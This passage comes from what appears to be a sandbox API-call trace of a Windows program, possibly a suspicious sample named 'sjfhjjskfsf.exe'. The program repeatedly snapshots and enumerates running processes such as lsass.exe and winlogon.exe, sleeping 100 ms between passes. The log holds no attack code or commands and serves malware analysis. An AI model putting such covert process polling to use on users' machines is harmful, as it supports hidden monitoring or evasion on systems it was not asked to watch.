th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.658] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.658] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.658] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0224.658] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.659] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.659] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.659] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.660] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.660] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.660] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.660] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.661] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.661] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.661] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.662] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.662] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.662] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0224.662] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0224.663] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0224.663] Process32NextW (in: hSnapshot=0x294, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0224.663] Sleep (dwMilliseconds=0x64) [0224.764] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x298 [0224.765] Process32FirstW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.765] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.765] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.766] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.766] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.766] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.767] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.767] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.767] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.767] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0224.768] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.768] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.768] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.769] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.769] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.769] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.769] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.770] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.770] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.770] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.771] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.771] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.771] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.771] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0224.772] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0224.772] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0224.772] Process32NextW (in: hSnapshot=0x298, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0224.773] Sleep (dwMilliseconds=0x64) [0224.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x29c [0224.874] Process32FirstW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.875] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.875] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.875] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.875] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.876] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.876] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.876] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.876] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.877] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0224.877] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.877] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.878] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.878] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.878] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.878] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.879] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.879] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.879] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.880] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.880] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.880] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.880] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.881] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0224.881] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0224.881] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0224.881] Process32NextW (in: hSnapshot=0x29c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0224.882] Sleep (dwMilliseconds=0x64) [0224.983] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2a0 [0224.984] Process32FirstW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.985] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.985] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.985] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.986] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.986] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.986] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.986] Process32NextW (in: hSnapshot=0x2a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, 